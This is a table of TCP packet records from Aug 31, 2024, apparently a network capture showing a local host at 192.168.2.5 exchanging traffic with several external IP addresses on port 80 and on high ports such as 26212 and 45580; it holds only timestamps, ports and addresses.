Aug 31, 2024 15:44:11.654295921 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.654306889 CEST	80	49717	185.215.113.26	192.168.2.5
Aug 31, 2024 15:44:11.654314041 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.654314041 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.654359102 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.654359102 CEST	49717	80	192.168.2.5	185.215.113.26
Aug 31, 2024 15:44:11.669348001 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:11.674117088 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:11.876188040 CEST	45580	49721	65.21.18.51	192.168.2.5
Aug 31, 2024 15:44:11.964385033 CEST	49721	45580	192.168.2.5	65.21.18.51
Aug 31, 2024 15:44:12.764605999 CEST	49716	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:12.764854908 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:12.769716978 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:12.769812107 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:12.769897938 CEST	80	49716	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:12.769943953 CEST	49716	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:12.918018103 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:12.922924042 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.484903097 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:13.489995003 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:13.528625011 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.528780937 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.529855967 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.534776926 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.673501968 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:13.673526049 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:13.673535109 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:13.673541069 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:13.673552036 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:13.673569918 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:13.673579931 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:13.673608065 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:13.673608065 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:13.771770000 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.771781921 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.771836042 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.772188902 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.772198915 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.772207975 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.772217989 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.772233009 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.772241116 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.772243023 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.772253036 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.772253990 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.772264957 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.772274017 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.772283077 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.772308111 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.772315979 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.776638985 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.776649952 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.776660919 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.776669979 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.776694059 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.776727915 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.811039925 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:13.815892935 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:13.921963930 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.921982050 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.921993017 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.922024012 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.922051907 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.922071934 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.922080994 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.922646999 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.922646999 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.922889948 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.922900915 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.922910929 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.922945023 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.922964096 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.923028946 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.923038006 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.923069954 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.923228979 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.923244953 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.923259020 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.923271894 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.923281908 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.923285961 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.923304081 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.923326969 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.923846006 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.923856974 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.923868895 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.923892021 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.923901081 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.924154043 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.924163103 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.924173117 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.924182892 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.924205065 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.924226999 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.924609900 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.924622059 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.924633980 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.924644947 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.924660921 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.924684048 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.926843882 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.926862001 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:13.926888943 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.926898003 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:13.995553017 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.003489017 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:14.008991957 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.071573973 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.071587086 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.071640015 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.072230101 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.072240114 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.072252035 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.072263956 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.072284937 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.072320938 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.072580099 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.072590113 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.072598934 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.072632074 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.072657108 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.074891090 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.074906111 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.074914932 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.074937105 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.074948072 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.079598904 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.079651117 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.079713106 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.079727888 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.079756975 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.079773903 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.079776049 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.079783916 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.079792976 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.079821110 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.079848051 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.079879045 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.079919100 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.079927921 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.079953909 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.079963923 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.080207109 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080216885 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080225945 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080254078 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.080267906 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.080311060 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080329895 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080338955 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080362082 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.080372095 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.080395937 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080435038 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.080509901 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080560923 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.080574036 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080584049 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080610037 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.080636024 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.080703020 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080713987 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080724001 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080734015 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.080749035 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.080776930 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.080928087 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081085920 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081095934 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081110954 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081124067 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081125975 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081135988 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081146955 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081156969 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081165075 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081196070 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081311941 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081321955 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081331015 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081368923 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081389904 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081394911 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081399918 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081408978 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081434965 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081459999 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081612110 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081623077 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081633091 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081656933 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081676960 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081706047 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081760883 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081793070 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081837893 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081928968 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081938982 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081947088 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.081975937 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.081990004 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.159562111 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.159642935 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.188807964 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.192725897 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:14.197535992 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:14.228848934 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.228862047 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.228872061 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.228883982 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.228903055 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.228913069 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.228923082 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.228924036 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.229005098 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.229006052 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.229923964 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.229984999 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.230021954 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.230032921 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.230041981 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.230052948 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.230062008 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.230074883 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.230104923 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.230190992 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.230201006 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.230211020 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.230243921 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.230273962 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.230365992 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.230376959 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.230391026 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.230424881 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.230453014 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.231646061 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.231654882 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.231697083 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.231707096 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.231718063 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.231724024 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.231734037 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.231776953 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.231776953 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234116077 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234124899 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234134912 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234165907 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234181881 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234210014 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234224081 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234229088 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234234095 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234255075 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234266043 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234266996 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234293938 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234293938 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234323978 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234379053 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234453917 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234466076 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234477043 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234491110 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234498024 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234528065 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234528065 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234642982 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234687090 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234695911 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234705925 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234714985 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234738111 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234769106 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234769106 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.234977007 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234987020 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.234996080 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235004902 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235017061 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235025883 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235032082 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235032082 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235043049 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235074997 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235104084 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235248089 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235258102 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235265017 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235366106 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235407114 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235407114 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235462904 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235474110 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235527992 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235554934 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235564947 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235574961 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235584021 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235594034 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235619068 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235649109 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235770941 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235805035 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235814095 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235825062 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235852957 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235852957 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235873938 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235882044 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235891104 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235922098 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235951900 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.235956907 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235986948 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.235996008 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236007929 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236033916 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.236063957 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.236160994 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236224890 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236236095 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236247063 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.236257076 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236265898 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236267090 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.236275911 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236285925 CEST	80	49722	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:14.236295938 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.236323118 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.236346006 CEST	49722	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:14.236763000 CEST	80	49722	185.215.113.16	192.168.2.5
